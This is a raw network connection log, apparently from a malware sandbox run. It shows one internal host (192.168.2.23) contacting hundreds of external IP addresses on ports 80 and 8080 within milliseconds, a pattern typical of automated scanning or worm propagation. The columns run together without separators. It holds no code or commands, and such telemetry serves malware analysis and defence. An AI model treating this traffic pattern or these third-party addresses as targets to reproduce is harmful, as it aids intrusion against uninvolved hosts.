                                                        Apr 14, 2024 16:34:53.793428898 CEST1277480192.168.2.23112.229.61.115
                                                        Apr 14, 2024 16:34:53.793447018 CEST1277480192.168.2.23112.219.66.31
                                                        Apr 14, 2024 16:34:53.793473959 CEST1277480192.168.2.23112.140.114.241
                                                        Apr 14, 2024 16:34:53.793476105 CEST1277480192.168.2.23112.252.42.171
                                                        Apr 14, 2024 16:34:53.793489933 CEST1277480192.168.2.23112.21.192.75
                                                        Apr 14, 2024 16:34:53.793525934 CEST1277480192.168.2.23112.5.14.108
                                                        Apr 14, 2024 16:34:53.793550014 CEST1277480192.168.2.23112.129.53.169
                                                        Apr 14, 2024 16:34:53.793570995 CEST1277480192.168.2.23112.176.137.212
                                                        Apr 14, 2024 16:34:53.793585062 CEST1277480192.168.2.23112.72.35.196
                                                        Apr 14, 2024 16:34:53.793617010 CEST1277480192.168.2.23112.226.110.202
                                                        Apr 14, 2024 16:34:53.793632984 CEST1277480192.168.2.23112.145.73.54
                                                        Apr 14, 2024 16:34:53.793667078 CEST1277480192.168.2.23112.112.116.224
                                                        Apr 14, 2024 16:34:53.793684959 CEST1277480192.168.2.23112.225.90.82
                                                        Apr 14, 2024 16:34:53.793693066 CEST1277480192.168.2.23112.113.223.216
                                                        Apr 14, 2024 16:34:53.793732882 CEST1277480192.168.2.23112.31.182.196
                                                        Apr 14, 2024 16:34:53.793766975 CEST1277480192.168.2.23112.92.68.64
                                                        Apr 14, 2024 16:34:53.793801069 CEST1277480192.168.2.23112.132.101.131
                                                        Apr 14, 2024 16:34:53.793801069 CEST1277480192.168.2.23112.72.90.27
                                                        Apr 14, 2024 16:34:53.793817043 CEST1277480192.168.2.23112.232.185.182
                                                        Apr 14, 2024 16:34:53.793859959 CEST1277480192.168.2.23112.119.186.44
                                                        Apr 14, 2024 16:34:53.793864012 CEST1277480192.168.2.23112.14.84.110
                                                        Apr 14, 2024 16:34:53.793893099 CEST1277480192.168.2.23112.171.154.149
                                                        Apr 14, 2024 16:34:53.793941021 CEST1277480192.168.2.23112.134.232.67
                                                        Apr 14, 2024 16:34:53.793998957 CEST1277480192.168.2.23112.95.91.93
                                                        Apr 14, 2024 16:34:53.794012070 CEST1277480192.168.2.23112.58.203.248
                                                        Apr 14, 2024 16:34:53.794055939 CEST1277480192.168.2.23112.176.229.19
                                                        Apr 14, 2024 16:34:53.794079065 CEST1277480192.168.2.23112.91.92.33
                                                        Apr 14, 2024 16:34:53.794079065 CEST1277480192.168.2.23112.104.207.7
                                                        Apr 14, 2024 16:34:53.794079065 CEST1277480192.168.2.23112.39.65.119
                                                        Apr 14, 2024 16:34:53.794092894 CEST1277480192.168.2.23112.139.113.48
                                                        Apr 14, 2024 16:34:53.794143915 CEST1277480192.168.2.23112.51.152.224
                                                        Apr 14, 2024 16:34:53.794171095 CEST1277480192.168.2.23112.180.124.9
                                                        Apr 14, 2024 16:34:53.794181108 CEST1277480192.168.2.23112.245.149.25
                                                        Apr 14, 2024 16:34:53.794198036 CEST1277480192.168.2.23112.95.51.234
                                                        Apr 14, 2024 16:34:53.794224024 CEST1277480192.168.2.23112.228.219.246
                                                        Apr 14, 2024 16:34:53.794249058 CEST1277480192.168.2.23112.221.119.114
                                                        Apr 14, 2024 16:34:53.794270992 CEST1277480192.168.2.23112.58.108.116
                                                        Apr 14, 2024 16:34:53.794337034 CEST1277480192.168.2.23112.25.169.54
                                                        Apr 14, 2024 16:34:53.794359922 CEST1277480192.168.2.23112.115.147.84
                                                        Apr 14, 2024 16:34:53.794359922 CEST1277480192.168.2.23112.153.176.243
                                                        Apr 14, 2024 16:34:53.794377089 CEST1277480192.168.2.23112.138.38.135
                                                        Apr 14, 2024 16:34:53.794387102 CEST1277480192.168.2.23112.99.106.156
                                                        Apr 14, 2024 16:34:53.794409037 CEST1277480192.168.2.23112.37.50.204
                                                        Apr 14, 2024 16:34:53.794426918 CEST1277480192.168.2.23112.43.134.145
                                                        Apr 14, 2024 16:34:53.794470072 CEST1277480192.168.2.23112.42.68.25
                                                        Apr 14, 2024 16:34:53.794559002 CEST1277480192.168.2.23112.67.238.142
                                                        Apr 14, 2024 16:34:53.794567108 CEST1277480192.168.2.23112.107.111.178
                                                        Apr 14, 2024 16:34:53.794569969 CEST1277480192.168.2.23112.166.85.122
                                                        Apr 14, 2024 16:34:53.794574976 CEST1277480192.168.2.23112.52.203.167
                                                        Apr 14, 2024 16:34:53.794584990 CEST1277480192.168.2.23112.149.34.227
                                                        Apr 14, 2024 16:34:53.794606924 CEST1277480192.168.2.23112.205.106.210
                                                        Apr 14, 2024 16:34:53.794627905 CEST1277480192.168.2.23112.250.188.126
                                                        Apr 14, 2024 16:34:53.794648886 CEST1277480192.168.2.23112.136.168.0
                                                        Apr 14, 2024 16:34:53.794665098 CEST1277480192.168.2.23112.218.63.51
                                                        Apr 14, 2024 16:34:53.794698954 CEST1277480192.168.2.23112.10.241.172
                                                        Apr 14, 2024 16:34:53.794727087 CEST1277480192.168.2.23112.70.203.187
                                                        Apr 14, 2024 16:34:53.794740915 CEST1277480192.168.2.23112.69.172.186
                                                        Apr 14, 2024 16:34:53.794744015 CEST1277480192.168.2.23112.240.236.73
                                                        Apr 14, 2024 16:34:53.794770956 CEST1277480192.168.2.23112.11.39.68
                                                        Apr 14, 2024 16:34:53.794784069 CEST1277480192.168.2.23112.138.30.117
                                                        Apr 14, 2024 16:34:53.794812918 CEST1277480192.168.2.23112.121.63.79
                                                        Apr 14, 2024 16:34:53.794826984 CEST1277480192.168.2.23112.207.59.101
                                                        Apr 14, 2024 16:34:53.794852018 CEST1277480192.168.2.23112.113.204.36
                                                        Apr 14, 2024 16:34:53.794903040 CEST1277480192.168.2.23112.28.124.201
                                                        Apr 14, 2024 16:34:53.794903040 CEST1277480192.168.2.23112.98.52.126
                                                        Apr 14, 2024 16:34:53.794903040 CEST1277480192.168.2.23112.236.231.19
                                                        Apr 14, 2024 16:34:53.794928074 CEST1277480192.168.2.23112.208.104.122
                                                        Apr 14, 2024 16:34:53.794956923 CEST1277480192.168.2.23112.221.216.242
                                                        Apr 14, 2024 16:34:53.794979095 CEST1277480192.168.2.23112.224.6.155
                                                        Apr 14, 2024 16:34:53.794991016 CEST1277480192.168.2.23112.150.199.16
                                                        Apr 14, 2024 16:34:53.794997931 CEST1277480192.168.2.23112.86.77.13
                                                        Apr 14, 2024 16:34:53.795028925 CEST1277480192.168.2.23112.250.16.58
                                                        Apr 14, 2024 16:34:53.795044899 CEST1277480192.168.2.23112.228.215.226
                                                        Apr 14, 2024 16:34:53.795079947 CEST1277480192.168.2.23112.243.60.226
                                                        Apr 14, 2024 16:34:53.795105934 CEST1277480192.168.2.23112.124.241.250
                                                        Apr 14, 2024 16:34:53.795128107 CEST1277480192.168.2.23112.154.107.213
                                                        Apr 14, 2024 16:34:53.795137882 CEST1277480192.168.2.23112.223.26.34
                                                        Apr 14, 2024 16:34:53.795152903 CEST1277480192.168.2.23112.96.39.193
                                                        Apr 14, 2024 16:34:53.795176029 CEST1277480192.168.2.23112.64.251.112
                                                        Apr 14, 2024 16:34:53.795214891 CEST1277480192.168.2.23112.186.96.59
                                                        Apr 14, 2024 16:34:53.795239925 CEST1277480192.168.2.23112.121.173.238
                                                        Apr 14, 2024 16:34:53.795278072 CEST1277480192.168.2.23112.58.120.64
                                                        Apr 14, 2024 16:34:53.795289040 CEST1277480192.168.2.23112.30.245.130
                                                        Apr 14, 2024 16:34:53.795316935 CEST1277480192.168.2.23112.136.246.3
                                                        Apr 14, 2024 16:34:53.795337915 CEST1277480192.168.2.23112.232.176.170
                                                        Apr 14, 2024 16:34:53.795352936 CEST1277480192.168.2.23112.123.71.75
                                                        Apr 14, 2024 16:34:53.795389891 CEST1277480192.168.2.23112.65.85.183
                                                        Apr 14, 2024 16:34:53.795392990 CEST1277480192.168.2.23112.65.34.56
                                                        Apr 14, 2024 16:34:53.795419931 CEST1277480192.168.2.23112.247.159.116
                                                        Apr 14, 2024 16:34:53.795447111 CEST1277480192.168.2.23112.226.31.205
                                                        Apr 14, 2024 16:34:53.795471907 CEST1277480192.168.2.23112.209.179.213
                                                        Apr 14, 2024 16:34:53.795504093 CEST1277480192.168.2.23112.10.98.179
                                                        Apr 14, 2024 16:34:53.795511961 CEST1277480192.168.2.23112.95.217.198
                                                        Apr 14, 2024 16:34:53.795864105 CEST4620080192.168.2.23112.175.21.77
                                                        Apr 14, 2024 16:34:53.795975924 CEST5109080192.168.2.23112.168.155.32
                                                        Apr 14, 2024 16:34:53.812153101 CEST130308080192.168.2.2331.213.245.175
                                                        Apr 14, 2024 16:34:53.812154055 CEST130308080192.168.2.2331.192.246.197
                                                        Apr 14, 2024 16:34:53.812154055 CEST130308080192.168.2.2394.245.219.219
                                                        Apr 14, 2024 16:34:53.812154055 CEST130308080192.168.2.2362.31.17.11
                                                        Apr 14, 2024 16:34:53.812154055 CEST130308080192.168.2.2362.43.148.241
                                                        Apr 14, 2024 16:34:53.812154055 CEST130308080192.168.2.2362.87.27.221
                                                        Apr 14, 2024 16:34:53.812155008 CEST130308080192.168.2.2331.145.242.182
                                                        Apr 14, 2024 16:34:53.812155008 CEST130308080192.168.2.2385.89.240.193
                                                        Apr 14, 2024 16:34:53.812158108 CEST130308080192.168.2.2394.117.67.56
                                                        Apr 14, 2024 16:34:53.812159061 CEST130308080192.168.2.2362.89.199.70
                                                        Apr 14, 2024 16:34:53.812177896 CEST130308080192.168.2.2395.121.214.205
                                                        Apr 14, 2024 16:34:53.812177896 CEST130308080192.168.2.2394.165.101.116
                                                        Apr 14, 2024 16:34:53.812206984 CEST130308080192.168.2.2362.172.76.188
                                                        Apr 14, 2024 16:34:53.812206984 CEST130308080192.168.2.2362.156.3.214
                                                        Apr 14, 2024 16:34:53.812206984 CEST130308080192.168.2.2385.252.226.223
                                                        Apr 14, 2024 16:34:53.812206984 CEST130308080192.168.2.2395.253.169.171
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2362.48.160.3
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2394.153.37.121
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2331.199.54.193
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2394.255.93.80
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2385.95.1.60
                                                        Apr 14, 2024 16:34:53.812208891 CEST130308080192.168.2.2394.188.181.210
                                                        Apr 14, 2024 16:34:53.812232971 CEST130308080192.168.2.2362.132.183.90
                                                        Apr 14, 2024 16:34:53.812232971 CEST130308080192.168.2.2362.81.236.202
                                                        Apr 14, 2024 16:34:53.812252045 CEST130308080192.168.2.2385.168.104.43
                                                        Apr 14, 2024 16:34:53.812252045 CEST130308080192.168.2.2394.192.220.41
                                                        Apr 14, 2024 16:34:53.812252045 CEST130308080192.168.2.2385.7.238.176
                                                        Apr 14, 2024 16:34:53.812252045 CEST130308080192.168.2.2385.69.204.177
                                                        Apr 14, 2024 16:34:53.812258005 CEST130308080192.168.2.2395.112.8.40
                                                        Apr 14, 2024 16:34:53.812259912 CEST130308080192.168.2.2395.23.107.168
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2385.3.239.68
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2395.144.141.212
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2394.187.124.121
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2395.86.57.73
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2385.203.59.1
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2331.172.178.3
                                                        Apr 14, 2024 16:34:53.812258959 CEST130308080192.168.2.2394.18.211.43
                                                        Apr 14, 2024 16:34:53.812279940 CEST130308080192.168.2.2394.205.177.62
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2362.247.242.49
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2395.113.241.167
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2395.252.57.114
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2395.199.3.59
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2395.46.62.52
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2385.62.74.141
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2362.227.83.212
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2331.88.140.200
                                                        Apr 14, 2024 16:34:53.812280893 CEST130308080192.168.2.2394.158.120.96
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2385.127.110.156
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2331.220.225.149
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2385.97.235.107
                                                        Apr 14, 2024 16:34:53.812282085 CEST130308080192.168.2.2362.91.40.66
                                                        Apr 14, 2024 16:34:53.812308073 CEST130308080192.168.2.2331.77.249.165
                                                        Apr 14, 2024 16:34:53.812308073 CEST130308080192.168.2.2385.145.9.249
                                                        Apr 14, 2024 16:34:53.812308073 CEST130308080192.168.2.2385.190.200.83
                                                        Apr 14, 2024 16:34:53.812308073 CEST130308080192.168.2.2394.20.202.155
                                                        Apr 14, 2024 16:34:53.812308073 CEST130308080192.168.2.2385.204.178.212
                                                        Apr 14, 2024 16:34:53.812309027 CEST130308080192.168.2.2385.199.45.166
                                                        Apr 14, 2024 16:34:53.812309027 CEST130308080192.168.2.2331.19.246.199
                                                        Apr 14, 2024 16:34:53.812309027 CEST130308080192.168.2.2331.197.125.138
                                                        Apr 14, 2024 16:34:53.812334061 CEST130308080192.168.2.2394.29.192.93
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2395.176.109.8
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2385.81.106.152
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2385.241.155.157
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2394.68.12.243
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2395.238.115.216
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2385.248.1.239
                                                        Apr 14, 2024 16:34:53.812335014 CEST130308080192.168.2.2362.208.21.161
                                                        Apr 14, 2024 16:34:53.812442064 CEST130308080192.168.2.2385.230.130.215
                                                        Apr 14, 2024 16:34:53.812442064 CEST130308080192.168.2.2394.107.233.147
                                                        Apr 14, 2024 16:34:53.812442064 CEST130308080192.168.2.2362.179.162.193
                                                        Apr 14, 2024 16:34:53.812442064 CEST130308080192.168.2.2362.99.171.126
                                                        Apr 14, 2024 16:34:53.812443018 CEST130308080192.168.2.2331.72.216.251
                                                        Apr 14, 2024 16:34:53.812494993 CEST130308080192.168.2.2385.87.217.94
                                                        Apr 14, 2024 16:34:53.812494993 CEST130308080192.168.2.2385.235.150.16
                                                        Apr 14, 2024 16:34:53.812494993 CEST130308080192.168.2.2362.228.22.162
                                                        Apr 14, 2024 16:34:53.812494993 CEST130308080192.168.2.2395.170.231.112
                                                        Apr 14, 2024 16:34:53.812551022 CEST130308080192.168.2.2331.27.128.93
                                                        Apr 14, 2024 16:34:53.812551022 CEST130308080192.168.2.2395.160.135.187
                                                        Apr 14, 2024 16:34:53.812592030 CEST130308080192.168.2.2394.94.139.101
                                                        Apr 14, 2024 16:34:53.812592030 CEST130308080192.168.2.2331.127.43.31
                                                        Apr 14, 2024 16:34:53.812592983 CEST130308080192.168.2.2394.147.130.162
                                                        Apr 14, 2024 16:34:53.812598944 CEST130308080192.168.2.2395.86.5.64
                                                        Apr 14, 2024 16:34:53.812598944 CEST130308080192.168.2.2385.234.9.69
                                                        Apr 14, 2024 16:34:53.812598944 CEST130308080192.168.2.2385.71.133.101
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2331.207.95.125
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2394.5.53.179
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2385.11.41.72
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2362.156.191.126
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2331.76.27.183
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2395.127.19.235
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2331.251.34.195
                                                        Apr 14, 2024 16:34:53.812625885 CEST130308080192.168.2.2395.167.236.178
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2362.235.27.193
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2395.211.238.242
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2385.127.55.165
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2362.169.68.107
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2395.38.159.237
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2395.188.121.65
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2394.108.131.21
                                                        Apr 14, 2024 16:34:53.812664986 CEST130308080192.168.2.2362.181.152.236
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2331.55.139.21
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2385.198.211.44
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2395.103.54.8
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2331.129.114.220
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2395.96.87.14
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2385.57.242.173
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2385.39.6.96
                                                        Apr 14, 2024 16:34:53.812678099 CEST130308080192.168.2.2331.184.177.70
                                                        Apr 14, 2024 16:34:53.812690973 CEST130308080192.168.2.2331.208.73.246
                                                        Apr 14, 2024 16:34:53.812690973 CEST130308080192.168.2.2395.233.14.83
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2394.7.13.190
                                                        Apr 14, 2024 16:34:53.812690973 CEST130308080192.168.2.2331.92.157.247
                                                        Apr 14, 2024 16:34:53.812691927 CEST130308080192.168.2.2362.41.251.46
                                                        Apr 14, 2024 16:34:53.812691927 CEST130308080192.168.2.2385.237.100.91
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2362.191.170.95
                                                        Apr 14, 2024 16:34:53.812691927 CEST130308080192.168.2.2395.185.154.229
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2395.35.68.193
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2362.44.70.120
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2362.83.227.228
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2395.96.157.64
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2395.102.153.240
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2362.235.46.15
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2362.34.149.200
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2394.149.188.255
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2331.63.31.159
                                                        Apr 14, 2024 16:34:53.812697887 CEST130308080192.168.2.2362.122.205.249
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2385.44.74.178
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2394.192.159.64
                                                        Apr 14, 2024 16:34:53.812690020 CEST130308080192.168.2.2362.20.233.177
                                                        Apr 14, 2024 16:34:53.812716961 CEST130308080192.168.2.2385.148.127.164
                                                        Apr 14, 2024 16:34:53.812716961 CEST130308080192.168.2.2331.123.138.115
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2395.106.225.63
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2385.203.130.123
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2395.154.56.135
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2362.0.253.66
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2362.158.133.22
                                                        Apr 14, 2024 16:34:53.812717915 CEST130308080192.168.2.2394.84.84.4
                                                        Apr 14, 2024 16:34:53.812732935 CEST130308080192.168.2.2385.4.25.99
                                                        Apr 14, 2024 16:34:53.812732935 CEST130308080192.168.2.2331.108.192.117
                                                        Apr 14, 2024 16:34:53.812732935 CEST130308080192.168.2.2362.136.155.176
                                                        Apr 14, 2024 16:34:53.812732935 CEST130308080192.168.2.2394.94.149.34
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2394.238.86.89
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2331.127.27.68
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2331.220.89.231
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2331.23.179.192
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2385.133.18.27
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2362.17.19.6
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2362.26.155.131
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2362.129.218.28
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2394.30.50.168
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2362.129.117.40
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2394.185.66.46
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2362.82.84.85
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2395.211.11.111
                                                        Apr 14, 2024 16:34:53.812750101 CEST130308080192.168.2.2331.38.196.10
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2385.222.131.207
                                                        Apr 14, 2024 16:34:53.812741995 CEST130308080192.168.2.2385.85.63.251
                                                        Apr 14, 2024 16:34:53.812742949 CEST130308080192.168.2.2362.72.82.98
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2395.86.136.253
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2394.102.146.169
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2394.176.217.249
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2331.126.191.120
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2395.74.165.77
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2362.94.138.119
                                                        Apr 14, 2024 16:34:53.812751055 CEST130308080192.168.2.2385.150.85.214
                                                        Apr 14, 2024 16:34:53.812767982 CEST130308080192.168.2.2394.14.138.83
                                                        Apr 14, 2024 16:34:53.812768936 CEST130308080192.168.2.2385.92.129.63
                                                        Apr 14, 2024 16:34:53.812768936 CEST130308080192.168.2.2395.60.82.37
                                                        Apr 14, 2024 16:34:53.812768936 CEST130308080192.168.2.2385.236.161.134
                                                        Apr 14, 2024 16:34:53.812768936 CEST130308080192.168.2.2395.152.165.103
                                                        Apr 14, 2024 16:34:53.812768936 CEST130308080192.168.2.2362.229.114.151
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.46.126.86
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.181.143.185
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.68.182.36
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.129.179.135
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.73.87.78
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.81.195.65
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2362.200.249.219
                                                        Apr 14, 2024 16:34:53.812773943 CEST130308080192.168.2.2394.5.176.118
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2362.212.87.59
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2385.229.75.110
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2362.224.138.50
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2331.124.111.249
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2385.45.245.174
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2385.103.203.46
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2394.81.207.86
                                                        Apr 14, 2024 16:34:53.812784910 CEST130308080192.168.2.2394.140.126.121
                                                        Apr 14, 2024 16:34:53.812798977 CEST130308080192.168.2.2394.29.172.9
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2395.160.62.120
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2331.107.198.60
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2385.239.97.30
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2385.166.161.61
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2394.146.124.210
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2395.155.103.103
                                                        Apr 14, 2024 16:34:53.812799931 CEST130308080192.168.2.2394.12.154.118
                                                        Apr 14, 2024 16:34:53.812839031 CEST130308080192.168.2.2394.173.180.123
                                                        Apr 14, 2024 16:34:53.812839985 CEST130308080192.168.2.2385.186.227.191
                                                        Apr 14, 2024 16:34:53.812841892 CEST130308080192.168.2.2331.143.233.228
                                                        Apr 14, 2024 16:34:53.812839985 CEST130308080192.168.2.2385.9.210.148
                                                        Apr 14, 2024 16:34:53.812841892 CEST130308080192.168.2.2385.245.222.246
                                                        Apr 14, 2024 16:34:53.812839985 CEST130308080192.168.2.2331.239.156.251
                                                        Apr 14, 2024 16:34:53.812839985 CEST130308080192.168.2.2395.161.84.92
                                                        Apr 14, 2024 16:34:53.812855005 CEST130308080192.168.2.2385.253.115.253
                                                        Apr 14, 2024 16:34:53.812855005 CEST130308080192.168.2.2394.210.194.205
                                                        Apr 14, 2024 16:34:53.812855005 CEST130308080192.168.2.2395.77.150.126
                                                        Apr 14, 2024 16:34:53.812855959 CEST130308080192.168.2.2362.210.153.33
                                                        Apr 14, 2024 16:34:53.812855959 CEST130308080192.168.2.2394.234.51.227
                                                        Apr 14, 2024 16:34:53.812855959 CEST130308080192.168.2.2362.140.232.60
                                                        Apr 14, 2024 16:34:53.812855959 CEST130308080192.168.2.2385.80.82.88
                                                        Apr 14, 2024 16:34:53.812855959 CEST130308080192.168.2.2394.132.134.210
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2385.252.62.182
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2394.120.133.137
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2395.30.10.103
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2394.91.225.253
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2331.11.152.82
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2385.188.2.2
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2362.217.71.255
                                                        Apr 14, 2024 16:34:53.812860966 CEST130308080192.168.2.2395.241.44.22
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2362.58.169.130
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2385.120.245.138
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2362.101.216.242
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2394.115.233.10
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2362.31.79.38
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2394.148.84.239
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2362.120.95.183
                                                        Apr 14, 2024 16:34:53.812866926 CEST130308080192.168.2.2362.2.95.150
                                                        Apr 14, 2024 16:34:53.812874079 CEST130308080192.168.2.2362.144.244.215
                                                        Apr 14, 2024 16:34:53.812911034 CEST130308080192.168.2.2395.251.230.248
                                                        Apr 14, 2024 16:34:53.812911034 CEST130308080192.168.2.2394.49.119.9
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2385.53.140.97
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2394.11.200.237
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2362.211.62.230
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2394.164.238.223
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2385.50.102.6
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2362.232.248.124
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2395.152.59.253
                                                        Apr 14, 2024 16:34:53.812943935 CEST130308080192.168.2.2385.21.186.88
                                                        Apr 14, 2024 16:34:53.812948942 CEST130308080192.168.2.2394.166.153.227
